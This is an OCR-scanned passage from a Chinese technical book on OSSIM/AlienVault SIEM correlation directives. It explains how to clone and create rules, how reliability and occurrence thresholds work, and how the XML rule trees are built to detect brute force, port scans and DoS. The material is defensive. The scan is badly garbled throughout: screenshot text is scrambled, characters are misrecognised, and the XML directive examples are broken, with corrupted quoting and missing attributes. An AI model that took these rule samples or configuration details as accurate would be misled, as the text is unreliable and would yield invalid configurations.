€ ”克隆 指令 ， 系 统 内 置 的 指令 默认 已 调试 完毕 ， 如 果 用 户 想 改动 设置 ， 首 先 要 克隆 该 
指令 ， 然 后 在 对 克隆 的 指令 进行 修改 。 克 隆 的 指令 会 保存 到 用 户 分 类 中 ， 而 且 克 隆 
的 指令 并 不 包含 知识 库 ， 对 于 知识 库 需要 手动 添加 ， 如 图 4-48 所 示 。 
Correlation Directives Found 2.083 PEL ee AN nal ) 


图 New Directive @ Test Directives | Restart Server Search a directive name 


7 User Contributed [5 arecwesl 


exploited Adobe Reader against DST. IP (CVE-2009-0658) 
abii, Adobe Reader - CVE-2009-0653 - Priority 4 


NAME RELIABILITY TMEOUT OCCURREACE FROM 76 DATA SOURCE EVENT TYPE FI ACTION 
o None 1 * IHOMENET è ANY * snori1001) @ SiDs:2008064 2008065 »More 中 
Adobe PDF J3IC2 E 6 1 * ICIP $ IDSTIP $ snor(1001) * SIDs:2800429 »Moe * B dg 


> DIRECTIVE INFO. 


图 4-48 ”克隆 规则 
待 克 隆 指令 调试 通过 之 后 ， 这 时 方 可 将 原来 的 指令 禁用 。 


o MIRRA: 注意 系统 默认 的 指令 不 能 在 Web UI 中 删除 ， 图 标 显示 灰色 , MMP 
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自 定义 或 克隆 的 指令 才 允 许 被 删除 ， 此 时 图 标 显示 为 国 。 
€ 编辑 指令 : 注意 系统 默认 的 指令 不 能 在 Web UI FAH, BETKE ， 而 用 户 
自 定义 或 克隆 的 指令 才 允 许 被 编辑 ， 此 时 图 标 显示 CU. 


我 们 对 指令 的 增 、 删 、 改 都 是 对 于 User Contributed 指令 和 Clone 指令 而 言 ， 系 统 默认 指 
| 令 规 则 只 能 启用 或 禁用 。 所 以 对 于 自己 修改 的 规则 位 于 /etc/ossim/server/UUID/user.xml X 
[ 件 中 。 对 于 UUID 的 值 ， 每 台 机 器 都 不 同 ， 使 用 中 需要 注意 。 


4.6.4 ” 读 懂 指令 规则 


在 图 4-49 中 ， 显 示 了 系统 内 置 的 AV Network attack 指令 ， 由 3 个 关联 级 别 和 4 条 规则 组 
成 了 这 条 指令 。 有 很 多 从 DST_IP 来 的 入 站 数据 包 会 被 丢弃 ， 数 据 源 来 自 于 cisco-pix。 


下 AlienVault Network is qrecvwes) 


bv mer sat oat on pe asd POLEN bos - Ponta 
AV NI k atti t dı d inbound kets fr DST_IP 
Y «8 noscere Reo cmd Ses ica an bo idem patus Fey 2 


Y RULES 
NAME 
Ww Firewall dropped packet 


M. Firewall dropped packets. 


vi 


Firewall dropped packets 


» DIRECTIVE INFO 


> KNOWLEDGE DB / 


EJM 


DATA SOURCE ID EVENT TYPE 10 * CATEGORY SUBCATEGORY CLASS NAME $  PRORTY $ RELIABLY $ 


Rodina (No UV] [EZ] 13 


xiate) string. 


图 4-49 查看 优先 级 和 可 信 度 


我 们 了 解 一 下 工作 过 程 ， 我 们 知道 RELIABILITY 默认 值 为 2， 当 和 指令 的 第 1 个 规则 相 
匹配 时 ,“Deny inbound string” 的 事件 SID 为 106011， 这 是 由 Cisco Pix 数据 源 插 件 负责 识别 。 

在 第 2 条 规则 里 ， 参 数 OCCURRENCE=3，TIMEOUT=10， 说 明 如 果 在 10 秒 钟 内 ,发生 
3 条 这 样 的 事件 ， 而 且 都 发 往 相 同 目的 地 ， 该 指令 的 RELIABILITY 将 会 变 为 4。 

以 此 类 推 ， 再 看 第 3 条 ， 如 果 在 20 秒 内 ， 有 5 个 这 样 的 事件 发 生 ， 该 指令 事件 的 
RELIABILITY 将 变 为 6。 

第 4 条 规则 ， 如 果 在 30 秒 内 ， 有 10 个 这 样 的 事件 发 生 ， 该 指令 的 RELIABILITY 将 增加 
到 8。 

如 果 读 者 充分 理解 了 这 些 规则 的 含义 , 以 及 自己 要 实现 的 目的 ,也 可 以 单 击 数 据 源 , 手动 
修改 初始 的 Priority 和 Reliability， 以 达到 检测 要 求 。 
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4.6.5 Directive Info 

背 令 信息 这 部 分 显示 了 AlienVault 合 规 映射 和 报表 ， 它 列 出 了 由 指令 而 触发 的 报警 信息 ， 
如 图 4-50 所 示 ， 左 边 第 一 列 ， 列 出 一 些 附加 信息 〈 称 为 属性 ) 的 指令 ， 如 什么 样 的 攻击 指令 
是 用 来 检测 。 网 络 异 常 属 性 设置 为 “YES”。IMP 表示 短暂 的 影响 ，QOS 表示 服务 质量 ， 这 些 
属性 设置 ， 用 于 B&C 业务 合 规 性 报告 ， 在 AlienVault USM 内 置 的 报告 中 。 


w AlienVault BruteForce {118 drecves] 


vv AN Bruteforce attack, vsftpd server authentication attack against SRC_IP 
* Delivery & Attack, Bruteforte Authentication, VsFtpd - Priority 
> RULES 


* DIRECTIVE INFO 


PROPERTIES 15027001 PC DSS 2.0 PCI D5S 3,0 ALARMS 
Tapa 9 Hm R.7 Establish an access control. R.72 Establish an access control $ SEE 
» No 15027001 found system for systems components with system for systems components io ATO OUS 
2 multiple users that restricts access That restrirs access based ona. 
Approach based on a user?s need to know, and user's need to know, and is set to 


Exploration 9 
Penetration € 
General Malware 9 
IMPQOS & 
IMPinfiek © 


MPLaWfu 9 


. 


IMP Image 


INP Financial 


. 


ISO27001 和 PCI DSS 的 内 容 大 家 参考 第 9 章 合 


* DIRECTIVE INFO 


PROPERTIES. 15027001 
Targeted 9 
Approach 9 


Exploration © 

Penetration © 

General Malware © 

MPQOS © 

IMP Infleak © 

INP Lawful © 

IMP Image No 15027001 found 

IMP Financial 

IMP Infleak 

Availability © 
Integrity. 
Confidentiality 


Net Anomaly 9 
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is set to "deny all unless specifically 
allowed. This access control system 
must include the following 


R.8.5.13 Limit repeated access 


attempts by locking out rhe user ID 


after not more than six attempts 


"ny all unless specifically 
allowed. This access control system 


must include the following: 


R.7.2.1 Coverage of all system 
components 


R.7.2.2 Assignment of privileges to 
iqdividuals based on job 


R.7.2.3 Default "deny-all" serung 
8.8.16 Limit repeated access 


attempts by locking out the user ID 
after not more than six attempts. 


4-50 显示 指令 信息 属性 以 及 合 规 信息 


如 图 4-51 所 示 。 在 左 侧 PROPERTIES 里 显示 的 属性 内 容 ， 右 侧 显 示 了 匹配 值 ， 如 果 需 要 
修改 内 容 ， 单 击 左下 方 EDIT 按钮 。 单 击 REMOVE 按钮 也 可 以 清除 所 有 属性 。 更 多 关于 


PCIDSS 2.0 


R.7.2 Establish an access control system 
for systems components with multiple 
users that restricts access based on a 
user?s need to know, and is set to "deny 
all” unless specifically allowed. This 
access control system must include the 
following: 


R.85.13 Limit repeated access attempts. 
by locking out the user ID after not more 
than six attempts. 


4-51 


规 报 表 一 节 。 


PCIDSS 3.0 


R72 Establish an access control 
system for systems components that 
restricts access based on a user's need 
to know, and is set to "deny all” unless 
specifically allowed, This access 
control system must include the 
following: 


R.7.2.1 Coverage of all system 
components 


R.7.2.2 Assignment of privileges to. 
individuals based on job classification 
and function. 


72.3 Default "deny-al" setting 


R.B.1.6 Limit repeated access attempts 
by locking out the user ID after not 
more than six attempts. 


Directive Info 中 显示 PCI DSS+Alarm 


ALARMS 


NAME 


AV Bruteforce 
attack, login 
authentication 
attack against 
DST.IP 


AV Bruteforce 
attack, login 
authentication 
attack against 
DST.IP 


AV Bruteforce 
attack, login 

authentication 
attack against 


AV Bruteforce 
attack, login 
authentication 
attack against. 
DST.IP 


AV Bruteforce 
attack, login 
authentication 
attack against 
DST.IP 


RISK. STATUS. 


Ly 


1 $ 
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A] 新 建 关联 指令 


关联 分 析 过 程 复杂 ， 但 是 在 OSSIM 提供 的 友好 界面 中 实现 并 不 复杂 ， 在 OSSIM 4.8 系统 
中 建立 关联 指令 规则 需要 以 下 7 个 步骤 : 


(1) 首先 在 Threat Intelligence 一 Directives 中 选择 “New Directive” 按 钮 ， 新 建 指令 ， 如 
图 4-52 所 示 。 


THREAT INTELLIGENCE 


POLICY ACTIONS PORTS DIRECTIVES COMPLIANCE MAPPING CROSS CORRELATION DATA SOURCE 


Correlation Directives Found 3 directives matching 'Syn Flood 


ie) New Directive 


49 Test Directives | Restart Server Search a directive name: Syn Flood 


图 4-52 新建 指令 


(2) 为 新 指令 指定 名 称 ， 选 择 攻击 检测 类 型 、 分 类 、 方 式 以 及 优先 级 ， 然 后 单 击 下 一 步 ， 
如 图 4-53 所 示 。 


GO 指定 规则 名 称 ， 如 图 4-54 所 示 。 


NAME FOR THE DIRECTIVE 
[es 


TAXONOMY 


tent [Exploitation &instaliaion [V] 
Strategy. [Service Exploit 1€] 


Method: [eniai of Service x] 


PRIORITY 


NAME FOR THE RULE 
EXE en OEGMO 
图 4-53 建立 新 指令 


图 4-54 规则 名 
(4) 根据 事件 类 型 选择 插件 ， 比 如 选择 Apache 插件 ， 如 图 4-55 所 示 。 
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Choose between Event Types Selection or Taxonomy 


图 Event Types O Taxonomy 


SELECT A PLUCIN 
ALADDIN Detector - Aladdin eSafe Gateway ^ 
Detector - Mat Neterforesr 
Detector - Alteon OS (Nortel Switches) 
Detector - Nue 


Detector - Artemisa: VOIP Honevoot 


Search a plugin name or ID: 
BA 


图 4-55 选择 插件 
C5) 根据 Apache 插件 规则 的 子 类 型 ， 选 择 Apache 返回 代码 ， 如 图 4-56 所 示 。 


Choose between Event Sub-Types Selection or Taxonomy 


图 Event Sub-Types O Taxonomy 


PLUGIN SIGNATURES 


6 items selected Remove 


[ |] Addall 


4 - Apache: server error [error] [Eu 
301 - Apache: Moved Permanently 
302 - Apache: Moved Temporarily 
303 - Apache: See Other. 

304 - Apache: Not Modified 

305 - Apache: Use Proxy 

307 - Apache: Temporary Redirect 


1 - Apache: server error [emerg] = 
2 - Apache: server error [alert] = 
401 - Apache: Unauthorized - 
400 - Apache: Bad Request - 
403 - Apache: Forbidden = 


402 - Apache: Payment Required 

404 - Apache: Not Found 

405 - Apache: Method Not Allowed 

406 - Apache: Not Acceptable (encoding) 


"Empty selection means ANY signature 


4-56 选择 Apache 返回 代码 


C6) 选择 源 和 目标 主机 (或 网 络 )， 如 图 4-57 所 示 。 
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NETWORK 
Erpty selection means ANY ever 
spunce nesrerwoax esnanou hasrerwaee 
se | 本 
c o ATASE c o AlASeS 
g Assets $a ases 
d Asset Groups ET 
source Bose cesmenon es Mic 
3103288 3 10. 
EL oc] 10 32 00>400 A771 司 10. 
Groups 8 1 
-| 
souncr eoeris gn. 
ME : 
II = a 10.32.670 hon 
fimm © d, Asset Groups 
a 5 88 Networks 
Network Groups. 
DsTINATION porre 


Use comma to specify several ports 
Can be negated using ^ 


[L— — 


> Reputation options 


EE 
图 4-57 选择 主机 和 目标 网 络 


(7) 选择 设备 可 靠 性 ， 如 图 4-58 所 示 。 


RELIABILITY 


Risk = (priority * reliability * asser. value) / 25. 


RULE DEFINED 


1 Would you like to specify any other condition for this rule (Protocol, Sensor, Special fields...? 


E3EZHES 
4-58 选择 设备 可 靠 性 


(8) 最 后 选择 FINISH 按钮 ， 还 可 以 指定 附加 规则 ， 例 如 选择 协议 类 型 和 传感器 ， 如 图 
4-59 所 示 。 


PROTOCOL 


MI Tcp UDP ICMP 


Y 


4-59 指定 附加 规则 
当 设 置 完 关联 指令 后 , 接 下 来 可 以 测试 规则 , 例如 系统 中 有 条 scanning port 445/TCP 的 关 


AN’ 
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联 指令 ,通过 它 发 现 网 络 中 存在 蠕虫 进行 445 端口 扫描 时 ， 进 行 报警 ， 如 图 4-60、 图 4-61 所 
示 。 


下 Alienvault Scan n di 


-45 AV-FREI 


Network scan, local host scanning port 445/TCP on SRC IP 
: Won scanning 


System Ce m infection, Internal Host s 
RutEs 
NAME REAHUTY TIMEOUT OCCURRENCE FROM 10 DATA SOURCE EVENT TYPE 可 
w Behavioral unusual port traffic detected 2 None 1 ANY ANY44$ snort (1001) SiDs: 2001569 » More 
"y Behavioral unusual port traffic detected 10 360 4 TSRCIP — ANY44s o1) 50s: 2001559 » More 
Behavioral unusual port traffic detected 10 43200 10000 VSRCJP — ANYAMS snort (1001) Sis: 2001569 » More. 


» DIRECTIVE INFO 


Knowledge DE 


KOB SEARCH: 
DATE $ a 
22010 AVRE N LAAST on SREP 
图 R 
Fd 4-60 445 端口 扫描 的 过 滤 规 则 
GRouPED 
rs ev (graue 
or "ET SCAN Behavior Unusual Pot ts are Potentalsonor oo , "Jc 
eee 2 à Riesa nat 
) Asche: Nor Modified m ， Yo mtosatoataso 


20140527 11:0757 


directive_event AV-FREE-FEED Network scan, local host scanning port 445/TCP on 
E 


图 4-61 通过 定义 的 指令 发 现 扫 描 并 在 SIEM 中 报警 


OSSIM 的 关联 规则 


关联 分 析 的 核心 通过 一 组 关联 指令 来 完成 , 下 面 利用 SSH 暴力 破解 的 例子 加 以 说 明 , SSH 
暴力 破解 (Brute Force) 大 约 自 UNIX 诞生 之 后 ， 就 衍生 出 来 的 一 种 攻击 行为 ， 据 统计 发 现 大 
约 有 50% 以 上 的 用 户 名 是 root。 一 个 低 可 靠 性 Clow reliability) 的 SSH 服务 器 ， 在 经 过 100 
次 登录 尝试 之 后 成 功 登 录 ， 而 高 可 靠 性 Chigh reliability) 的 SSH 服务 器 ， 则 经 过 10000 次 登 
录 才 成 功 , 那么 关联 引擎 可 通过 在 一 定时 间 内 ,登录 的 次 数 ， 以 及 这 些 时 间 的 不 同 源 地 址 和 相 
同 目标 人 P 地 址 ， 以 及 这 些 IP 地 址 来 自 于 那些 国家 ， 它 们 信誉 度 如 何等 信息 ， 来 综合 判定 攻击 
以 ， 便 自动 作出 响应 ， 如 图 4-62 所 示 。 
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低 可 靠 性 高 可 靠 性 


10000 次 登录 尝试 


99 次 失败 


9999 次 失败 


图 4-62 高 低 可 靠 性 的 比较 


4.8.1 关联 指令 配置 界面 

1E OSSIM 中 ， 关 联 指令 的 界面 通过 Configuration 一 Threat Intelligence— Directives 打开 ， 
经 过 前 面 几 节 内 容 的 学 习 ， 大 家 已 经 接触 过 关联 指令 的 界面 ， 下 面 我 们 归纳 一 下 ， 如 图 4-63 
所 示 。 


DASHBOARDS ANALYSIS ENVIRONMENT REPORTS 


THREAT INTELLIGENCE. reru 
DEPLOVMENT 

POLCY — acrows — Ponrs | DIMECTIVES E ATASOURCE TAXONOMY Jam 

fi 5 
cv que 一 一 一 检测 关联 指令 

Correlation Directives _sount2:078 directives in the system — 

B O— — XXE 

S New Diective GÈ Test Directives QA Restare Server _ Search a drertive rame E 载 所 有 关联 指 今 
用 户 自 定义 

> User Contributed. g— ——— ————— — — — — 

关联 指令 


AlienVault Attacks haueael 一 一 


AlienVault BruteForce ir sees 


AlienVault DOS its vec 


AlienVault Malware (1239 arcis] 


AlienVault Misc i4 


-USM 内 置 了 超过 2000 个 关联 指令 


AlienVault Network Ba ciecie 


AlienVault Policy 1117 directies} 


AlienVault Scada (10 creawe 


AlienVault Scan iss aremes 


图 4-63. OSSIM 关联 指令 界面 
界面 上 的 关键 功能 解释 如 下 : 


€ New Directive: 单 击 此 选项 以 从 头 开始 创建 一 个 新 的 指令 。 
€  TestDirectives: 单 击 此 按钮 ， 将 检测 当前 新 建 /修改 的 指令 是 否 正确 。 
€ Restat Server: 单 击 此 按钮 ， 将 重启 ossim-server 进程 ， 凡 是 修改 了 任何 一 条 关联 指 
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令 ， 都 需 重新 启动 Server， 按 这 个 按钮 比 你 重启 整个 USM 服务 器 更 明智 。 需 要 注意 
的 是 ， 虽 然 重启 时 间 短 暂 ， 但 在 服务 重启 期 间 ， 所 有 关联 数据 会 丢失 。 
下 面 以 一 条 完整 指令 Av Bruteforce attack,login authentication attack against DST. IP 为 例 ， 
介绍 其 内 部 结构 ， 如 图 4-64 所 示 。 


iji Sigiut 


RW TMAOUT OCCURRENCE FROM To NT TP 


More gf 


"ENS PROTOCOL STOVO VSCRAAME PASS VSERDATAT UBERDATAI USEKDATAS USEROATAM USERDATAS VMEADATAS USERDATA) 


€ » 


» KNOWLEDGE os 


4-64 一 条 完整 指令 
€ Sensor: 传感器 ， 用 于 收集 各 种 事件 信息 。 
€ Protocol: 协议 ， 包 括 ANY. TCP. UDP. ICMP. 
€ Sticky different; 用 于 文件 及 目录 属性 设 定 的 sticky, 从 OSSIM 43 起 在 关联 指令 中 添 
加 了 新 属性 ，Sticky different ( ZF) áh 357542: ) 域 规则 中 Sticky different 为 None。 它 
是 用 来 设 定 指令 规则 的 属性 。 
有 关 Sticky different 的 取 值 大 家 可 参考 /etc/ossim/server/directives.xsd 文件 


<xs:simpleType name="stickydifferenttype"> 


</xs:simpleType> 


当 新 收集 的 事件 输入 到 达 关 联 引擎 时 ， 它 将 和 已 有 的 事件 相关 联 ， 如 果 事件 属性 (如 IP 
地 址 和 端口 号 ) 相同 ， 但 一 个 指令 的 属性 里 可 以 设置 不 同 的 粘贴 位 ， 比 如 None、DST_PORT、 
SRC IP. PLUGIN ID 等 ， 用 来 区 别 收 到 的 不 同事 件 ， 以 便 进行 相互 关联 。 例 如 ， 在 端口 扫描 
类 攻击 中 ， 如 果 设 置 目标 端口 为 Sticky different, 那么 只 有 来 自 不 同 目标 端口 的 事件 才 被 关联 ， 
在 Web UI 中 效果 如 图 4-65 所 示 。 
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* AlienVault DoS [1 4 


AV Attacks, Possible DDoS using SQL servers 


d Delivery & Attáck, Denial of Service - Resource exhaustion, Reflection using SQL servers - Priority 6 


图 4-65 STICKY DIFF 


TIJF/etc/ossim/server/alienvault-dos.xml 查看 关联 指令 AvAttacks. Possible DDoS, lit fJ 
则 如 图 4-66 所 示 。 


="6"> 
«rule type="d 


ctor" name-"MC-SQLR Response" 
.IP" sticky different 
from="ANY" port to 1001” plugin_sid 


<rules> 
tor” name-"MC-SQLR Ri 


1:DST IP" sticky differen W 
ANY” plugin id-"1001" plugin sid-"2020306" pr 


rules> 
IZ 
/rules> 
rule> 
/directive> 


图 4-66 复杂 的 顽 套 规则 


下 面 是 一 个 比较 复杂 的 嵌 套 规则 ， 如 图 4-67 所 示 。 


«directive id 1" name 
D priority 
rule type: name 


p from: 
fron: port_to reliabilitys"2" occurrence 


TT 


r” name d packets" from to 


» m reliability-"4" occurrencez"3" time out 
IB Plugin_id plugin_sid > 
«rules» 
rule type r” name: 4 
DST_IP" port_fron: Port_to "liability 
Plugin_id plugin_sid 
次 «rules? 


<rule type " 


reliability 


图 4-67 规则 树 的 嵌 套 


对 于 Userdata 各 字段 显示 如 图 4-68 所 示 。 
€ Username: 事件 中 指定 的 用 户 名 。 
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€ Pas: 事件 中 指定 的 口令 。 
€  Userdatal-Userdata8: 事件 中 指定 的 数据 域 。 


CUSTOMIZE COLUMNS o 
Select the columns to show in the rules, the rest will be in che "More ra! 

8 items selected. Remove all Add all 

Name = | sensor 5 

Reliability = | Protocol 

Timeout = | sucky or 


Occurrence — | usemame 


From = | Pass 


证 定义 列 控 钮 [. . . ] 所 弹出 的 窗口 


4-68 查看 更 多 关联 规则 的 属性 


E 属性 中 列 出 From、To、Data source , Event Type THH è 号 表示 可 修改 , Action 下 的 中 
| 号 代表 可 添加 规则 ， 但 系统 默认 指令 中 的 规则 不 允许 修改 。 


4.8.2 ”构建 规则 


SIEM 在 攻击 检测 中 发 挥 着 重要 作用 ， 它 能 将 收集 的 数据 包括 网 络 基础 设施 、 网 络 应 用 、 
各 种 网 络 流量 、 漏 洞 扫描 结果 等 信息 ， 以 图 表 的 方式 直观 地 呈现 给 用 户 。 对 于 SIEM 而 言 数据 
越 多 ， 越 有 利于 分 析 结 果 的 准确 性 。 

建立 OSSIM 关联 规则 库 是 一 个 迭代 过 程 ， 需 要 你 结合 企业 自身 情况 进行 长 期 的 精细 化 调 
整 ， 若 没有 规则 ， 则 无 法 分 析 数 据 。 面 对 成 千 上 万 种 可 能 建立 的 规则 ,我 们 自己 要 明确 哪些 规 
则 是 我 们 急需 的 , 这 就 需要 运 维 人 员 不 仅仅 是 系统 的 管理 者 , 有 时 候 需 要 将 自己 放 在 攻击 者 的 
角色 ， 并 开始 监视 攻击 者 想 “ 窃 取 ” 的 数据 或 对 系统 进行 模拟 渗透 ， 从 这 个 层面 开始 制定 防御 
检测 规则 ,在 编写 规则 时 ， 将 一 些 关键 的 攻击 向 量 写 入 规则 。 接 下 来 需要 模拟 一 些 攻击 以 完善 
规则 。 

开源 版 OSSIM 系统 中 默认 提供 了 84 种 关联 检测 规则 ， 在 OSSIM USM 4.15 商业 版 本 中 
提供 了 2024 种 规则 ， 具 体位 置 在 菜单 Configuration 一 Threat Intelligence— Directives 中 查看 。 

在 学 习 关 联 规则 中 经 常 碰 到 各 种 指令 ， 这 些 指令 常用 XML 来 描述 ， 关 联 规则 系统 的 规则 
属性 ， 含 义 如 下 : 
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A) Id: 该 属性 允许 定义 相关 联 指令 的 唯一 标识 。 这 种 编号 必须 遵循 由 OSSIM 发 布 
的 指令 。 

(2) Name: 此 属性 允许 定义 指令 的 名 称 〈 当 指令 匹配 时 显示 )。 

(3) SRC: W IP Hh. 

(4) DST: 目标 IP 地 址 。 

(5) Port from: 源 端口 。 

(6) Port to: 目标 端口 。 

(7) Priority: 此 属性 允许 定义 关联 指令 的 优先 级 。 

(8) Type: 该 属性 定义 规则 类 型 。 仅 有 两 种 类 型 的 规则 。 

(9) Detector: 使 用 检测 部 件 信息 的 规则 ， 其 包含 于 服务 器 数据 库 。 

(10) Reliability: 此 参数 越 大 (接近 10)， 表 明报 警 越 真 实 。 此 参数 在 关联 过 程 中 至 关 重 
要 。 实 际 上 ， 随 着 规则 的 陆续 匹配 ， 本 组 报警 误 报 的 概率 会 降低 。 所 以 有 可 能 在 每 个 标记 规则 
中 修改 高 级 报警 的 可 靠 性 。 其 后 的 规则 会 以 相对 (例如 : +3， 意 味 着 相对 于 前 面 的 规则 ， 全 
局 可 靠 性 提高 了 3 个 等 级 ) 或 者 绝对 (例如 : 7， 表 明 现 在 的 可 靠 性 等 级 是 7) 的 方式 估计 其 
等 级 。 

(11) Occurence: 出 现 频率 。 

(12) Plugin id: 此 属性 定义 由 规则 预测 的 报警 的 来 源 。 实 际 上 ， 每 个 插件 都 有 一 个 相关 
标识 ， 此 标识 允许 在 相关 性 规则 中 引用 该 插件 。 

(13) Plugin sid: 此 参数 定义 了 和 插件 相关 联 的 事件 。 通 过 在 配置 菜单 的 插件 子 菜单 中 ， 
单 击 所 需 plugin id 便 可 以 配置 plugin_sid。 例 如， 由 plugin id 1501 和 plugin_sid400 提供 的 报 
SAEI: "apache: 错误 请 求 ” 有 了 这 两 种 属性 (plugin id 和 plugin_sid)， 就 可 以 精确 定义 
规则 所 预计 的 事件 。 

(14) Time out: 超时 设 定 ， 此 属性 允许 表明 符合 某 个 规则 事件 的 等 待 时 间 。 如 果 此 事件 没 
有 在 给 定 的 时 间 ( 属 性 以 秒 计 算 ) 内 发 生 ， 相 关 性 指令 会 结束 ， 并 返回 到 前 面 规则 计算 的 结果 。 

C15) Protocol (协议 ): 此 属性 允许 配置 由 规则 预计 的 网 络 事件 类 型 。 可 以 定义 三 种 类 
型 的 协议 : TCP、UDP、ICMP。 这 意味 着 有 可 能 重新 使 用 和 上 一 个 规则 匹配 的 协议 类 型 。 所 
以 ， 只 需 做 如 下 表明 : protocol=“1:PROTOCOL”， 以 此 来 明确 表达 此 规则 的 协议 和 上 一 级 规 
则 相 匹 配 的 协议 。 如 果 要 恢复 二 级 规则 匹配 的 协议 ， 可 表示 为 protocol=“2:PROTOCOL”。 

(16) From: 此 属性 表明 预报 警 的 IP 源 地 址 。 可 以 使 用 6 种 不 同 的 方法 : 

€ 。 ANY， 表明 任意 地 址 源 和 此 属性 匹配 。 

© xx.xx 指定 IP 地 址 。 

e 通过 引用 和 引用 协议 属性 原则 一 致 。 例 如 ，1: SCR_IP= 和 一 级 相关 指令 匹配 的 报警 
的 源 地 址 ，2: DST_IP= 和 二 级 相关 性 指令 报警 的 目标 地 址 。 这 样 的 规则 参看 图 4-69 
所 示 的 例子 。 
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AV Service attack, successful denial of service against web server on DST_IP 
e Delivery & Attack, Denial of Service - Known vulnerability, Web Server 
v RULES 
NAME RELIABILITY TIMEOUT OCCURRENCE FROM To DATA SOURCE EVENT TYPE 
Ww Apache mod. cache denial of service attempt detected 0 None 1 ANY ANY:80 snort(1001) — 35 
nmap 
Apache is down 8 30 1 TDSTIP80] [TSRCIP80] monitor — sips:2 
(2008) 
图 4-69 引用 协议 


e 网络 名 称 ， 可 以 通过 在 框架 下 定义 的 网 络 名 称 来 使 用 通过 某 个 范围 的 IP 地址。 变量 
HOME _ NET 定义 了 与 其 相关 的 所 有 在 框架 下 定义 的 网 络 。 

@ ”特定 地 址 ， 表 示 由 破 折 号 分 隔 的 几 个 IP 地 址 。 

€ ”拒绝 ， 此 允许 拒绝 部 分 IP 地 址 或 者 网 络 名 称 ， 例 如 : 1192.168.2.3, HOME NET. 


深入 关联 规则 


4.9.1 基本 操作 

OSSIM 中 的 告警 关联 组 件 , 利用 预先 定义 的 规则 (/etc/ossim/server/*.xml) 进行 关联 分 析 。 
用 户 将 如 何 对 关联 规则 进行 操作 呢 ? 我 们 通过 Web 界面 ， 新 建 一 个 Correlation Directives, Xf 
建 两 个 规则 ssh 和 test， 然 后 我 们 查看 详细 内 容 ， 路 径 在 /etc/ossim/server 目录 ， 名 为 userxml 
文件 。 其 他 默认 规则 由 /etc/ossim/server/directives.xml 定义 ， 如 图 4-70 所 示 。 


Directives | Properties 


Correlation Directives Found 86 directives in the system 
+} New Directive X; Test Directives Restart Server Search a directive name Search 


W User Contributed [2 directives] 


* Rules 
Name Reliability: Timeout Occurrence From To Data Source. Event Type E Action. 
SIDs: 1 3 
192.168.150.116 45799 > 
ssh 3 None 1 * IHOME NET * 192.168.150.0/24 * sshd (4003) € 26 25 24 * More 中 
19 18 16 
> Directive info 
Y Rules 
Name Reliability Timeout Occurrence From To Data Source Event Type L2 Action 
" 5 SIDs: 202 
est123 o None 1 * 192.168.150.116 * 192.168.150.116 * iis (1502) + 201200 "More 4- 


> Directive info 


420 HENES 
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当 系 统 调 用 Directive 下 的 策略 时 ， 根 据 categories.xml 配置 文件 读 取 相 应 的 XML 配置 文 
这 些 策略 文件 存储 位 置 为 /etc/ossim/server/， 文 件 功能 如 下 : 


alienvault-attacks.xml: AlienVault 攻击 类 策略 。 

alienvault-bruteforce.xml: AlienVault 暴力 破解 类 攻击 。 

alienvault-dos.xml: Alienvault 拒绝 服务 类 。 

alienvault-malware.xml: Alienvault 恶意 软件 ( 包括 检测 各 种 蠕虫 的 规则 ) 。 
alienvault-misc.xml: Alienvault 各 种 失误 类 (Miscellaneous) 。 
alienvault-network.xml: Alienvault 网 络 类 (开源 版 没 内 容 ) 。 
alienvault-policy.xml: Alienvault 策略 。 


件 


alienvault-scan.xml: Alienvault 扫描 。 
user.xml: Alienvault 用 户 自 定 义 。 

如 果 OSSIM 关联 引擎 读 不 到 这 些 策略 配置 文件 则 在 Analysis 一 Alarm 中 不 会 生成 报警 。 
接 下 来 开始 解读 XML 规则 实例 。 


4.9.2 理解 规则 树 

关联 引擎 通过 规则 来 实现 对 安全 事件 的 关联 分 析 ， 读 者 需要 看 懂 OSSIM 的 规则 ， 其 中 采 
用 了 特有 的 树 形 规则 ， 在 规则 树 中 的 每 一 个 节点 对 应 一 条 关联 规则 〈rules)。 在 匹配 时 关联 引 
擎 将 某 段 时 间 内 收 到 的 统一 格式 的 报警 , 从 根 节点 开始 往 叶 子 节点 逐次 匹配 , 系统 根据 匹配 的 
结果 ， 可 以 进行 事件 聚合 和 再 次 提升 报警 级 别 。 

从 图 4-71 中 可 以 看 出 ， 这 种 基于 事件 序列 的 关联 方法 ， 每 条 指令 相当 于 一 颗 由 规则 组 成 
的 树 ， 所 以 可 以 把 它 叫做 基于 树 形 指令 Directive) 的 关联 方法 ， 基 本 思想 是 根据 相关 事件 序 
列 ， 创 建 一 系列 的 规则 来 描述 攻击 场景 。 


Pml v 


图 4-71 自 定义 指令 内 容 


在 OSSIM 系统 中 由 XML 语言 定义 关联 序列 ， 关 联 分 析 引 擎 启动 时 ， 将 所 有 关联 导入 每 
个 关联 规则 序列 ， 并 由 下 面 标签 组 成 ， 将 实际 XML 提炼 后 ， 得 到 如 下 模板 : 
<directive id-"" name-"" priority-""» 
«rule type-"" name-"" reliability-"" occurence-"" from-"" to-"" port from-"" 
port to-"" plugin id-""plugin sid-""- 
«rules» 
«rules» 
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</rule> 

</directive> 

每 个 序列 起 始 包 括 两 个 标签 “directive id” 和 “directive name", REP sp y x], 
括 多 个 规则 ， 规 则 之 间 又 可 嵌 套 规则 ， 即 可 以 递归 。 

其 中 Rule 表示 规则 ， 规 则 后 面 描述 了 一 个 可 能 发 生 的 攻击 场景 ，Event 代表 在 当前 已 发 
生 的 攻击 场景 下 ， 一 个 攻击 场景 由 若干 条 规则 组 成 ， 这 些 规则 可 能 是 “与 ”和 “或 ”的 关系 。 
这 样 表示 的 好 处 是 如 果 发 生 一 个 攻击 场景 ， 那 么 只 需要 满足 哪些 规则 即 可 。 

通过 计算 每 个 Rule 里 的 Reliability 值 ， 以 确认 该 攻击 发 生 的 可 信和 度 为 多 少 。 其 中 场景 
(Scene) id 用 directive id 来 表示 。 前 面 讲 过 Reliability 可 以 是 0~10 的 整数 ， 直 接 给 可 靠 性 
赋值 ， 也 可 以 使 用 一 个 变量 ， 表 示 当 这 个 规则 满足 时 ， 将 上 一 步 攻击 场景 的 可 靠 性 做 修改 ,将 
结果 存 入 New Reliability 中 。 规则 部 分 的 其 他 属性 代表 了 将 它 做 匹配 的 Event 的 属性 值 , 而 与 
数据 库 的 具体 交互 是 通过 Action 来 表示 。 

我 们 看 个 实际 的 例子 ， 下 面 这 段 指令 主要 用 来 检测 公 网 服务 器 是 否 可 用 ， 其 中 包含 了 两 个 
规则 。 


«directive id-"500000" name-"Public Web Server unavailable" Priority="1"> 
<rule type-"detector" name-"server unavailable" reliability-"1" 
